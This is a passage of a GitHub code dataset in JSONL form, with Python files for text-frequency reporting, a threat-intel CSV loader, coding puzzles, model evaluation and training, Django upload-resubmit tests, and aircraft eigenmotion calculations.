% KNOWN_AHEAD_COUNT)\n print()\n\n word_num = 0\n for (normal, count) in combined_normal_count.most_common(TOP_WORDS_COUNT):\n word_num += 1\n print(78*'-')\n print('\\t'.join([normal, '#%d, %.6f%% of words' % (word_num, 100*count/sum_weights)]))\n print()\n\n print('occurs as:')\n for ((orig, fields_str), count) in combined_normal_breakdown[normal].most_common():\n print(' ' + '\\t'.join([orig, fields_str, '%.2f%%' % (100*count/sum_weights)]))\n print()\n\n (good_sents, need_sents) = find_sentences(normal, args.sortedtoks, known_set)\n known_set.add(normal)\n\n print('top sentences using this word where all words known:')\n for s in good_sents:\n print(' ' + s)\n print()\n\n print('top sentences using this word where NOT all words known:')\n for s in need_sents:\n print(' ' + s)\n print()\n","repo_name":"rsimmons/massif","sub_path":"backend/ordering/refold_report.py","file_name":"refold_report.py","file_ext":"py","file_size_in_byte":5583,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"76"} +{"seq_id":"38165221688","text":"import csv\nimport gzip\nimport os\n\nfrom stream_alert.rule_processor import LOGGER\n\nclass StreamThreatIntel(object):\n \"\"\"Load intelligence from csv.gz files into a dictionary.\"\"\"\n IOC_KEY = 'streamalert:ioc'\n\n __intelligence = {}\n __config = {}\n\n @classmethod\n def read_compressed_files(cls, intel_dir, delimiter=','):\n \"\"\"Read intelligence into memory\n\n Read all intelligence from csv.gz files located in threat_intel\n directory into a dictionary. CSV filename should follow the convention\n .csv.gz. The basename (without extension) of csv\n file will be the key in return dictionary.\n\n Returns:\n (dict): Threat intelligence in the following format:\n {\n \"domain\": {\n \"evil1.com\": [\"apt_domain\", \"source1 reported evil1.com\"],\n \"evil2.com\": [\"c2_domain\", \"source2 reported evil2.com\"]\n },\n \"ip\": {\n \"1.1.1.2\": [\"scan_ip\", \"source reported ip1\"],\n \"2.2.2.2\": [\"scan_ip\", \"source reported ip2\"]\n },\n \"url\": {\n \"www.hacker.com/evil_page\": [\"mal_url\", \"source_foo\"]\n },\n \"md5\": {\n \"0123456789abcdef0123456789abcdef\": [\"mal_md5\", \"source_bar\"]\n }\n }\n None: if the intelligence directory does not exist\n \"\"\"\n if not os.path.exists(intel_dir):\n return\n\n gz_files = [os.path.join(intel_dir, gz_file) for gz_file\n in os.listdir(intel_dir)\n if gz_file.endswith('.gz')]\n\n for gz_file in gz_files:\n with gzip.open(gz_file, 'r') as ioc_file:\n csv_reader = csv.reader(ioc_file, delimiter=delimiter)\n ioc_type = os.path.basename(gz_file).split('.')[0]\n if ioc_type not in cls.__intelligence:\n cls.__intelligence[ioc_type] = dict()\n for row in csv_reader:\n if len(row) < 2:\n LOGGER.debug('Warning, each row in CSV file should '\n 'contain at least two fields. 
Bad row [%s]',\n row)\n continue\n cls.__intelligence[ioc_type][row[0]] = row[1:]\n\n return cls.__intelligence\n\n @classmethod\n def load_intelligence(cls, config, intel_dir='threat_intel'):\n \"\"\"Load intelligence from csv.gz files into a dictionary\n\n Args:\n intel_dir (str): Location where stores compressed intelligence\n \"\"\"\n if cls.__intelligence:\n return\n if (config.get('threat_intel')\n and config['threat_intel'].get('enabled')\n and config['threat_intel'].get('mapping')):\n cls.__intelligence = cls.read_compressed_files(intel_dir)\n cls.__config = config['threat_intel'].get('mapping')\n\n @classmethod\n def get_intelligence(cls):\n return cls.__intelligence\n\n @classmethod\n def get_config(cls):\n return cls.__config\n","repo_name":"OpenGovDataMirror/A_gsa_streamalert","sub_path":"stream_alert/rule_processor/threat_intel.py","file_name":"threat_intel.py","file_ext":"py","file_size_in_byte":3248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19863564599","text":"def uncompress(line):\n newLine = \"\"\n index = 0\n while index < len(line):\n if line[index] == \"(\":\n marker = \"\"\n while line[index] != \")\":\n marker = marker + line[index]\n index += 1\n numChar, repeat = marker[1:].split(\"x\") # ) is not included because while loop stops when it encounters )\n index += 1\n for i in range(int(repeat)):\n newLine = newLine + line[index:index+int(numChar)]\n index += int(numChar)\n else:\n newLine = newLine + line[index]\n index += 1\n return newLine\n\ndef getMarker(line):\n marker = \"\"\n index = 0\n while line[index] != \")\":\n marker += line[index]\n index += 1\n numChar, repeat = marker[1:].split(\"x\") # ) is not included because while loop stops when it encounters )\n index += 1\n return int(numChar), int(repeat), index\n\ndef expandMaker(line):\n newLine = \"\"\n numChar, repeat, mIndex = getMarker(line)\n index = mIndex\n for i in range(repeat-1):\n newLine += line[index:index+numChar]\n return newLine, index\n\n\"\"\"\ndef uncompressV2(line):\n total = 0\n index = 0\n while index < len(line):\n if line[index] == \"(\":\n line = line[index:]\n index = 0\n rLine, rIndex = expandMaker(line[index:])\n index += rIndex\n line = line[:index] + rLine + line[index:]\n else:\n total += 1\n index += 1\n return total\n\"\"\"\ndef uncompressV2(line):\n #algorithm from https://www.reddit.com/r/adventofcode/comments/5hbygy/2016_day_9_solutions/dazentu/\n values = [1 for i in range(len(line))]\n total = 0\n i = 0\n while i < len(line):\n if line[i] == \"(\":\n numChar, repeat, index = getMarker(line[i:])\n for j in range(numChar):\n values[i+j+index] *= repeat\n i += index\n else:\n total += values[i]\n i += 1\n return total\n\n\n\n\n\ninFile = open(\"input.txt\", \"r\")\nlines = inFile.readlines()\ninFile.close()\n\nline = lines[0]\n\nnewLine = uncompress(line)\nprint(len(newLine))\n#first solution is 123908\n\nprint(uncompressV2(\"(25x3)(3x3)ABC(2x3)XY(5x2)PQRSTX(18x9)(3x2)TWO(5x7)SEVEN\"))\nprint(uncompressV2(line))\n#final solution is 10755693147","repo_name":"rosskyl/AdventOfCode","sub_path":"2016/Day_9/day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38052577994","text":"class Solution:\n def findRelativeRanks(self, nums: List[int]) -> List[str]:\n sn = nums.copy()\n sn.sort()\n n = len(nums)\n for i in range(n):\n ins = sn.index(nums[i])\n if ins == n - 1:\n nums[i] = 
\"Gold Medal\"\n elif ins == n - 2:\n nums[i] = \"Silver Medal\"\n elif ins == n - 3:\n nums[i] = \"Bronze Medal\"\n else:\n nums[i] = str(n - ins)\n return nums\n","repo_name":"k0syan/Leetcode","sub_path":"506_relative_ranks.py","file_name":"506_relative_ranks.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13429827041","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 2 22:16:59 2019\nhttps://qiita.com/nnn112358/items/168e507a34272957b1f3\n@author: PC\n\"\"\"\n\nfrom control.matlab import * # MATLAB-like functions\n\n# System matrics\nA1 = [[0, 1.], [-4, -1]]\nB1 = [[0], [1.]]\nC1 = [[1., 0]]\nsys1ss = ss(A1, B1, C1, 0)\nprint(sys2ss)\n\nsys1tf = ss2tf(sys1ss)\nprint(sys2tf)","repo_name":"hashimoto0106/Control","sub_path":"現代制御/101_状態方程式→伝達関数.py","file_name":"101_状態方程式→伝達関数.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10577108876","text":"import torch\nimport logging\nimport numpy as np\nfrom tqdm import tqdm\nfrom core.engine import losses as mylosses\n\ndef eval_dataset(cfg, model, data_loader, device, model_type='pytorch'):\n logger = logging.getLogger(\"CORE.inference\")\n\n # Create losses\n criterion_logloss = mylosses.LogLoss(reduction=False)\n criterion_jaccard = mylosses.JaccardIndex(reduction=False)\n criterion_dice = mylosses.DiceLoss(reduction=False)\n\n stats = {\n 'sample_count': 0.0,\n 'loss': 0.0,\n 'jaccard': 0.0,\n 'dice': 0.0\n }\n\n for data_entry in tqdm(data_loader):\n images, labels, masks = data_entry\n\n # Forward images\n with torch.no_grad():\n # B,C,H,W = images.shape\n if model_type == 'onnx':\n images_np = images.numpy().astype(np.float32)\n outputs = model.forward(images_np, preprocess=False, postprocess=False)\n outputs = torch.from_numpy(outputs).to(device)\n elif model_type == 'tensorrt':\n images_np = images.numpy().astype(np.float32)\n outputs = model.forward(images_np, preprocess=False, postprocess=False)\n outputs = torch.from_numpy(outputs).to(device) \n elif model_type == 'pytorch':\n images = images.to(device)\n outputs = model(images)\n else:\n logger.error(\"Unknown model type: %s. 
Aborting...\".format(model_type))\n return -1\n\n # Calculate losses\n targets = labels.to(device)\n masks = masks.to(device)\n\n losses = criterion_logloss.forward(outputs, targets, masks)\n outputs_binarized = torch.threshold(outputs, cfg.TENSORBOARD.METRICS_BIN_THRESHOLD, 0.0)\n jaccard_losses = criterion_jaccard.forward(outputs_binarized, targets)\n dice_losses = criterion_dice.forward(outputs_binarized, targets)\n\n # Reduce loss (mean)\n stats['loss'] += torch.mean(losses).item()\n stats['jaccard'] += torch.mean(jaccard_losses).item()\n stats['dice'] += torch.mean(dice_losses).item()\n stats['sample_count'] += 1\n\n # Return results\n stats['loss'] /= stats['sample_count']\n stats['jaccard'] /= stats['sample_count']\n stats['dice'] /= stats['sample_count']\n\n result_dict = {\n 'loss': stats['loss'],\n 'jaccard': stats['jaccard'],\n 'dice': stats['dice']\n }\n\n return result_dict","repo_name":"NikitaPut/neural_network","sub_path":"land-analyzer-model/core/engine/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10855072021","text":"import heapq\n\ndef solution(jobs):\n heap = []\n answer = 0\n \n start, now = -1, 0\n i = 0\n \n while i < len(jobs):\n for j in jobs:\n if start < j[0] <= now:\n heapq.heappush(heap, [j[1], j[0]])\n if heap:\n d, r = heapq.heappop(heap)\n start = now\n now += d\n answer += now - r\n i += 1\n else:\n now += 1\n \n return answer // len(jobs)","repo_name":"rimmiya/Algorithms","sub_path":"프로그래머스/lv3/42627. 디스크 컨트롤러/디스크 컨트롤러.py","file_name":"디스크 컨트롤러.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"868796656","text":"import pandas as pd\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.preprocessing import LabelEncoder\nimport pickle\n\ndef load_data(geolocation=False, drop=True):\n \n if geolocation:\n df_geo= pd.read_csv('../data/olist_geolocation_dataset.csv')\n df_geo.rename(columns={'geolocation_lng': 'lng',\n 'geolocation_lat': 'lat'}, inplace=True)\n\n return df_geo\n else:\n \n if drop:\n df = pd.read_csv('../data/olist_merge.csv')\n col2drop = ['order_id', 'customer_id', 'order_status', 'order_approved_at', 'order_estimated_delivery_date',\n 'order_delivered_carrier_date', 'order_delivered_customer_date', 'order_estimated_delivery_date',\n 'order_item_id', 'product_id', 'seller_id', 'shipping_limit_date',\n 'payment_sequential',\n 'price', 'review_id', 'review_comment_title', 'review_comment_message', 'review_creation_date',\n 'review_answer_timestamp', 'product_name_lenght', 'product_description_lenght', 'product_photos_qty',\n 'customer_unique_id', 'customer_zip_code_prefix',\n 'seller_zip_code_prefix', 'seller_city', 'seller_state', 'state', \n 'city', 'c_lat_y', 'c_lng_y', 'product_weight_g', 'product_length_cm', 'product_height_cm',\n 'product_width_cm']\n df.rename(columns={'c_lng_x': 'lng',\n 'c_lat_x': 'lat'}, inplace=True)\n \n\n df.drop(col2drop, axis=1, inplace=True)\n df.drop(['lng','lat'], axis=1, inplace=True)\n return df\n\n else:\n df = pd.read_csv('../data/olist_merge.csv')\n return df\n\ndef create_features():\n df_ = load_data(drop=False)\n df = df_.loc[(df_[\"order_purchase_timestamp\"] > \"2018-06-02 00:00:00\"), :]\n col2drop = ['order_purchase_timestamp', 'order_id', 'customer_id', 'order_approved_at', 'order_estimated_delivery_date',\n 
'order_delivered_carrier_date', 'order_delivered_customer_date', 'order_estimated_delivery_date',\n 'order_item_id', 'product_id', 'seller_id', 'shipping_limit_date', \n 'price', 'review_id', 'review_comment_title', 'review_comment_message', 'review_creation_date',\n 'review_answer_timestamp', 'product_name_lenght', 'product_description_lenght', 'product_photos_qty',\n 'customer_unique_id', 'customer_zip_code_prefix',\n 'seller_zip_code_prefix', 'seller_city', 'seller_state', 'state', 'c_lat_x',\n 'c_lng_x', 'city', 'c_lat_y', 'c_lng_y']\n\n df.drop(col2drop, axis=1, inplace=True)\n\n # Missing value for product columns\n df[\"product_weight_g\"] = df[\"product_weight_g\"].fillna(df[\"product_weight_g\"].median())\n df[\"product_length_cm\"] = df[\"product_length_cm\"].fillna(df[\"product_length_cm\"].median())\n df[\"product_height_cm\"] = df[\"product_height_cm\"].fillna(df[\"product_height_cm\"].median())\n df[\"product_width_cm\"] = df[\"product_width_cm\"].fillna(df[\"product_width_cm\"].median())\n df[\"freight_value\"] = df[\"freight_value\"].fillna(df[\"freight_value\"].median())\n df[\"payment_sequential\"] = df[\"payment_sequential\"].fillna(df[\"payment_sequential\"].median())\n # Missing value for review_score\n df[\"review_score\"] = df[\"review_score\"].fillna(df[\"review_score\"].median())\n # Missing value for payment_type\n df[\"payment_type\"] = df[\"payment_type\"].fillna('credit_card')\n # Missing value for payment_installments\n df[\"payment_installments\"] = df[\"payment_installments\"].fillna(df[\"payment_installments\"].median())\n # Missing value for product_category_name\n df[\"product_category_name\"] = df[\"product_category_name\"].fillna(\"None\")\n # Missing value fro payment_values\n df['payment_value'] = df['payment_value'].fillna(df['payment_value'].median())\n\n Y = df['payment_value']\n df.drop([\"payment_value\"], axis=1, inplace=True)\n X = df \n return X, Y\n\ndef label_encoder(dataframe, binary_col):\n labelencoder = LabelEncoder()\n for col in binary_col:\n dataframe[col] = labelencoder.fit_transform(dataframe[col])\n return dataframe\n\nX, Y = create_features()\n\nl_col = ['product_category_name', 'customer_city', 'customer_state', 'payment_type', 'order_status']\nX = label_encoder(X, l_col)\nmodel = RandomForestRegressor()\nrf_fit= model.fit(X, Y)\npickle.dump(rf_fit, open(\"rf_model.pkl\", 'wb'))","repo_name":"seneralkan/olist-streamlit-app","sub_path":"model/rf_model.py","file_name":"rf_model.py","file_ext":"py","file_size_in_byte":4501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8117569312","text":"\"\"\"Stat rendering helpers.\"\"\"\n\nfrom django import template\nfrom django.utils.safestring import mark_safe\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef percent_display(part, whole, ndigits=2):\n \"\"\"Percent rendering\"\"\"\n percent = 100 * float(part) / float(whole)\n round_percent = round(percent, ndigits)\n return mark_safe(f\"{round_percent} %\")\n","repo_name":"MTES-MCT/aides-territoires","sub_path":"src/stats/templatetags/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"77"} +{"seq_id":"25460795486","text":"try:\n from unittest import mock\nexcept ImportError:\n try:\n import mock\n except ImportError:\n mock = None\n\nimport os\nimport tempfile\n\nfrom django import forms\nfrom django.contrib.admin.sites import AdminSite\nfrom 
django.contrib.admin import ModelAdmin\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.messages.storage.fallback import FallbackStorage\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.db import models\nfrom django.test import TestCase, RequestFactory\nfrom django.views.generic import FormView\n\nfrom file_resubmit import widgets\nfrom file_resubmit import admin\n\nif not mock:\n raise ImproperlyConfigured(\"For testing mock is required.\")\n\n\n# shortest possible PNG file, courtesy http://garethrees.org/2007/11/14/pngcrush/\nPNG = (\n b'\\x89PNG\\r\\n\\x1a\\n'\n b'\\x00\\x00\\x00\\rIHDR\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x08\\x06\\x00\\x00\\x00\\x1f\\x15\\xc4\\x89'\n b'\\x00\\x00\\x00\\nIDATx\\x9cc\\x00\\x01\\x00\\x00\\x05\\x00\\x01\\r\\n-\\xb4'\n b'\\x00\\x00\\x00\\x00IEND\\xaeB`\\x82'\n)\n\n\nclass TestForm(forms.Form):\n pass\n\n\nclass OneFileForm(forms.Form):\n name = forms.CharField(required=True)\n upload_file = forms.FileField(widget=widgets.ResubmitFileWidget())\n\n\nclass OneImageForm(forms.Form):\n name = forms.CharField(required=True)\n upload_image = forms.ImageField(widget=widgets.ResubmitImageWidget())\n\n\nclass BaseResubmitFileMixin(object):\n def setUp(self):\n self.factory = RequestFactory()\n self.temporary_file = tempfile.NamedTemporaryFile(delete=False)\n self.temporary_content = os.urandom(1024)\n self.temporary_file.write(self.temporary_content)\n self.temporary_file.close()\n self.temporary_image = tempfile.NamedTemporaryFile(suffix=\".png\", delete=False)\n self.temporary_image.write(PNG)\n self.temporary_image.close()\n \n def get_resubmit_field(self, form, field_name):\n resubmit_field_name = '{fn}_cache_key'.format(fn=field_name)\n name_prefix='name=\"{rfn}\"'.format(rfn=resubmit_field_name)\n value_prefix='value=\"'\n rendered = str(form[field_name])\n self.assertIn(name_prefix, rendered)\n name_prefix_idx = rendered.index(name_prefix)\n value_idx = rendered.index(value_prefix, name_prefix_idx)\n value_close_idx = rendered.index('\"', value_idx + len(value_prefix))\n value = rendered[value_idx + len(value_prefix):value_close_idx]\n return resubmit_field_name, value\n\n\nclass TestResubmitFileWidget(BaseResubmitFileMixin, TestCase):\n class DummyFormView(FormView):\n template_name = 'blank.html' # TemplateView requires this attribute\n form_class = TestForm\n success_url = '/done/'\n\n class OneFileView(DummyFormView):\n form_class = OneFileForm\n\n class OneImageView(DummyFormView):\n form_class = OneImageForm\n\n def test_file_widget(self):\n request = self.factory.get('/example/')\n response = self.OneFileView.as_view()(request)\n form = response.context_data['form']\n file_field = form.fields.get('upload_file')\n self.assertIsInstance(file_field.widget, widgets.ResubmitFileWidget)\n\n def test_file_resubmit(self):\n data = {}\n with open(self.temporary_file.name, 'rb') as fo:\n request = self.factory.post('/example/', {'upload_file': fo})\n response = self.OneFileView.as_view()(request)\n form = response.context_data['form']\n self.assertEqual(len(form.errors), 1)\n resubmit_field, resubmit_value = self.get_resubmit_field(form, 'upload_file')\n data = {\n resubmit_field: resubmit_value\n }\n resubmit_req = self.factory.post('/example/', data)\n resubmit_resp = self.OneFileView.as_view()(resubmit_req)\n form = resubmit_resp.context_data['form']\n uploaded_file = form.cleaned_data['upload_file']\n self.assertEqual(uploaded_file.read(), self.temporary_content)\n \n def test_image_widget(self):\n request = 
self.factory.get('/example/')\n response = self.OneImageView.as_view()(request)\n form = response.context_data['form']\n image_field = form.fields.get('upload_image')\n self.assertIsInstance(image_field.widget, widgets.ResubmitImageWidget)\n\n def test_image_resubmit(self):\n data = {}\n with open(self.temporary_image.name, 'rb') as fo:\n request = self.factory.post('/example/', {'upload_image': fo})\n response = self.OneImageView.as_view()(request)\n form = response.context_data['form']\n self.assertEqual(len(form.errors), 1)\n resubmit_field, resubmit_value = self.get_resubmit_field(form, 'upload_image')\n data = {\n resubmit_field: resubmit_value\n }\n resubmit_req = self.factory.post('/example/', data)\n resubmit_resp = self.OneImageView.as_view()(resubmit_req)\n form = resubmit_resp.context_data['form']\n uploaded_image = form.cleaned_data['upload_image']\n self.assertEqual(uploaded_image.read(), PNG)\n\n\nclass TestModel(models.Model):\n \"\"\"\n I skip the step of saving the model to the database\n \"\"\"\n def save_base(*args, **kwargs):\n pass\n \n class Meta:\n abstract = True\n\n\nclass TestModelAdmin(ModelAdmin):\n \"\"\"\n Instead of returning with a redirect to the change\n list page, I just return the saved object\n \"\"\"\n def response_add(self, request, obj, *args, **kwargs):\n return obj\n\n\nclass TestResubmitAdminWidget(BaseResubmitFileMixin, TestCase):\n class TestFileModel(TestModel):\n admin_name = models.CharField(max_length=100, blank=False)\n admin_upload_file = models.FileField(upload_to=\"fake/\")\n\n class TestImageModel(TestModel):\n admin_name = models.CharField(max_length=100, blank=False)\n admin_upload_image = models.ImageField(upload_to=\"fake/\")\n\n class TestFileAdmin(admin.AdminResubmitMixin, TestModelAdmin):\n pass\n\n class TestImageAdmin(admin.AdminResubmitMixin, TestModelAdmin):\n pass\n\n def setUp(self):\n super(TestResubmitAdminWidget, self).setUp()\n User = get_user_model()\n self.user = User.objects.create_superuser(\n 'TestUser',\n 'testuser@example.com',\n '12345678'\n )\n\n def test_file_admin(self):\n testadmin = self.TestFileAdmin(model=self.TestFileModel, admin_site=AdminSite())\n request = self.factory.get('/admin/example/')\n request.user = self.user\n response = testadmin.add_view(request)\n file_field = response.context_data['adminform'].form.fields.get('admin_upload_file')\n self.assertIsInstance(file_field.widget, admin.AdminResubmitFileWidget)\n\n def test_image_admin(self):\n testadmin = self.TestImageAdmin(model=self.TestImageModel, admin_site=AdminSite())\n request = self.factory.get('/admin/example/')\n request.user = self.user\n response = testadmin.add_view(request)\n image_field = response.context_data['adminform'].form.fields.get('admin_upload_image')\n self.assertIsInstance(image_field.widget, admin.AdminResubmitImageWidget)\n\n def test_image_resubmit_admin(self):\n testadmin = self.TestImageAdmin(model=self.TestImageModel, admin_site=AdminSite())\n with open(self.temporary_image.name, 'rb') as fo:\n request = self.factory.post('/admin/example/', {'admin_upload_image': fo})\n request.user = self.user\n request._dont_enforce_csrf_checks = True\n response = testadmin.add_view(request)\n form = response.context_data['adminform'].form\n resubmit_field, resubmit_value = self.get_resubmit_field(form, 'admin_upload_image')\n data = {\n resubmit_field: resubmit_value\n }\n resubmit_req = self.factory.post('/admin/example/', data)\n resubmit_req.user = self.user\n resubmit_req._dont_enforce_csrf_checks = True\n resubmit_resp = 
testadmin.add_view(resubmit_req)\n form = resubmit_resp.context_data['adminform'].form\n self.assertEqual(len(form.errors), 1)\n uploaded_image = form.cleaned_data['admin_upload_image']\n self.assertEqual(uploaded_image.read(), PNG)\n\n def test_file_resubmit_admin(self):\n testadmin = self.TestFileAdmin(model=self.TestFileModel, admin_site=AdminSite())\n with open(self.temporary_file.name, 'rb') as fo:\n request = self.factory.post('/admin/example/', {'admin_upload_file': fo})\n request.user = self.user\n request._dont_enforce_csrf_checks = True\n response = testadmin.add_view(request)\n form = response.context_data['adminform'].form\n resubmit_field, resubmit_value = self.get_resubmit_field(form, 'admin_upload_file')\n data = {\n resubmit_field: resubmit_value\n }\n resubmit_req = self.factory.post('/admin/example/', data)\n resubmit_req.user = self.user\n resubmit_req._dont_enforce_csrf_checks = True\n resubmit_resp = testadmin.add_view(resubmit_req)\n form = resubmit_resp.context_data['adminform'].form\n print(\"\\n\".join(str(err) for err in form.errors.items()))\n self.assertEqual(len(form.errors), 1)\n uploaded_file = form.cleaned_data['admin_upload_file']\n self.assertEqual(uploaded_file.read(), self.temporary_content)\n\n def test_image_resubmit_save_admin(self):\n testadmin = self.TestImageAdmin(model=self.TestImageModel, admin_site=AdminSite())\n with open(self.temporary_image.name, 'rb') as fo:\n request = self.factory.post('/admin/example/', {'admin_upload_image': fo})\n request.user = self.user\n request._dont_enforce_csrf_checks = True\n response = testadmin.add_view(request)\n form = response.context_data['adminform'].form\n resubmit_field, resubmit_value = self.get_resubmit_field(form, 'admin_upload_image')\n data = {\n 'admin_name': \"Sample\",\n resubmit_field: resubmit_value\n }\n resubmit_req = self.factory.post('/admin/example/', data)\n setattr(resubmit_req, 'session', 'session')\n messages = FallbackStorage(resubmit_req)\n setattr(resubmit_req, '_messages', messages)\n resubmit_req.user = self.user\n resubmit_req._dont_enforce_csrf_checks = True\n saved_obj = testadmin.add_view(resubmit_req)\n self.assertEqual(saved_obj.admin_upload_image.read(), PNG)\n\n def test_file_resubmit_save_admin(self):\n testadmin = self.TestFileAdmin(model=self.TestFileModel, admin_site=AdminSite())\n with open(self.temporary_file.name, 'rb') as fo:\n request = self.factory.post('/admin/example/', {'admin_upload_file': fo})\n request.user = self.user\n request._dont_enforce_csrf_checks = True\n response = testadmin.add_view(request)\n form = response.context_data['adminform'].form\n resubmit_field, resubmit_value = self.get_resubmit_field(form, 'admin_upload_file')\n data = {\n 'admin_name': \"Sample\",\n resubmit_field: resubmit_value\n }\n resubmit_req = self.factory.post('/admin/example/', data)\n setattr(resubmit_req, 'session', 'session')\n messages = FallbackStorage(resubmit_req)\n setattr(resubmit_req, '_messages', messages)\n resubmit_req.user = self.user\n resubmit_req._dont_enforce_csrf_checks = True\n saved_obj = testadmin.add_view(resubmit_req)\n self.assertEqual(saved_obj.admin_upload_file.read(), self.temporary_content)\n","repo_name":"un1t/django-file-resubmit","sub_path":"tests/test_all.py","file_name":"test_all.py","file_ext":"py","file_size_in_byte":11581,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"77"} +{"seq_id":"43510867755","text":"from data.Cit_par import *\nfrom src.data_extraction.data_main import Data\nfrom 
src.data_processing.get_weight import get_weight_at_t\nfrom src.data_processing.aerodynamics import ISA\nfrom src.data_extraction.time_series_tool import TimeSeriesTool\n\nimport cmath\n\n\nclass Eigenmotions:\n    def __init__(self, time_spm=0, time_phugoid=0, time_dutch_roll=0, time_aperiodic_roll=0, time_spiral_motion=0):\n        if time_spm != 0:\n            self.eigenvalue_spm, self.prop_spm = self.__calc_spm(time_spm)\n        else:\n            self.eigenvalue_spm = \"Time of motion not provided\"\n\n        if time_phugoid != 0:\n            self.eigenvalue_phugoid, self.prop_phugoid = self.__calc_phugoid(time_phugoid)\n        else:\n            self.eigenvalue_phugoid = \"Time of motion not provided\"\n\n        if time_dutch_roll != 0:\n            self.eigenvalue_dutch_roll, self.prop_dutch_roll = self.__calc_dutch_roll(time_dutch_roll)\n        else:\n            self.eigenvalue_dutch_roll = \"Time of motion not provided\"\n\n        if time_aperiodic_roll != 0:\n            self.eigenvalue_aperiodic_roll, self.prop_aperiodic_roll = self.__calc_aperiodic_roll(time_aperiodic_roll)\n        else:\n            self.eigenvalue_aperiodic_roll = \"Time of motion not provided\"\n\n        if time_spiral_motion != 0:\n            self.eigenvalue_spiral_motion, self.prop_spiral_motion = self.__calc_spiral_motion(time_spiral_motion)\n        else:\n            self.eigenvalue_spiral_motion = \"Time of motion not provided\"\n\n    @staticmethod\n    def __get_flight_conditions(t):\n        data = Data(r'RefData.mat')\n        mat_data = data.get_mat().get_data()\n        time = mat_data['time']\n        rh_fu = mat_data['rh_engine_FU']\n        lh_fu = mat_data['lh_engine_FU']\n\n        alt = mat_data['Dadc1_alt']\n\n        for idx, t_i in enumerate(time):\n            if time[idx] < t <= time[idx+1]:\n                break\n\n        m = get_weight_at_t(t, time, rh_fu, lh_fu)/9.80665\n\n        ts_tool = TimeSeriesTool()\n        specific_t_mdat_vals = ts_tool.get_t_specific_mdat_values(t)\n        V = specific_t_mdat_vals['Dadc1_tas'][0]\n\n        h = alt[idx]\n        rho = ISA(h)[2]\n\n        mub = m / (rho * S * b)\n        muc = m / (rho * S * c)\n\n        CL = 2 * m / (rho * V ** 2 * S)  # Lift coefficient [ ]\n\n        # Cmalpha = -0.5669172330105713\n        Cmalpha = -0.6405\n\n        return mub, muc, CL, Cmalpha, V\n\n    @staticmethod\n    def __calc_eigenvalues(u, v, w):\n        return (-v+cmath.sqrt(v**2-4*u*w))/(2*u), (-v-cmath.sqrt(v**2-4*u*w))/(2*u)\n\n    @staticmethod\n    def __calc_eigenvalue_properties(eigenvalue):\n        zeta = -eigenvalue.real/cmath.sqrt(eigenvalue.real**2+eigenvalue.imag**2)\n        half_t = cmath.log(1 / 2) / eigenvalue.real\n\n        if eigenvalue.imag == 0:\n            P = None\n            nat_frequency = None\n\n        else:\n            P = (2*pi)/eigenvalue.imag\n            nat_frequency = (2*pi)/P\n\n        return {\"zeta\": zeta.real, \"period\": P, \"natural_freq\": nat_frequency, \"half_time\": half_t.real}\n\n    # ----------------------------------------------------------------------------------------\n    def __calc_spm(self, t):\n        mub, muc, CL, Cma, V = self.__get_flight_conditions(t)\n\n        coef_a = 2*muc*KY2*(2*muc-CZadot)\n        coef_b = -2*muc*KY2*CZa-(2*muc+CZq)*Cmadot-(2*muc-CZadot)*Cmq\n        coef_c = CZa*Cmq-(2*muc+CZq)*Cma\n\n        eigenvalue = list(self.__calc_eigenvalues(coef_a, coef_b, coef_c))[0][0]\n\n        return eigenvalue*V/c, self.__calc_eigenvalue_properties(eigenvalue)\n\n    def __calc_phugoid(self, t):\n        mub, muc, CL, Cma, V = self.__get_flight_conditions(t)\n\n        coef_a = 2*muc*(CZa*Cmq-2*muc*Cma)\n        coef_b = 2*muc*(CXu*Cma-Cmu*CXa)+Cmq*(CZu*CXa-CXu*CZa)\n        coef_c = CZ0*(Cmu*CZa-Cma*CZu)\n\n        eigenvalue = list(self.__calc_eigenvalues(coef_a, coef_b, coef_c))[0][0]\n\n        return eigenvalue*V/c, self.__calc_eigenvalue_properties(eigenvalue)\n\n    def __calc_dutch_roll(self, t):\n        mub, muc, CL, Cma, V = self.__get_flight_conditions(t)\n\n        coef_a = 8*mub**2*KZ2\n        coef_b = 
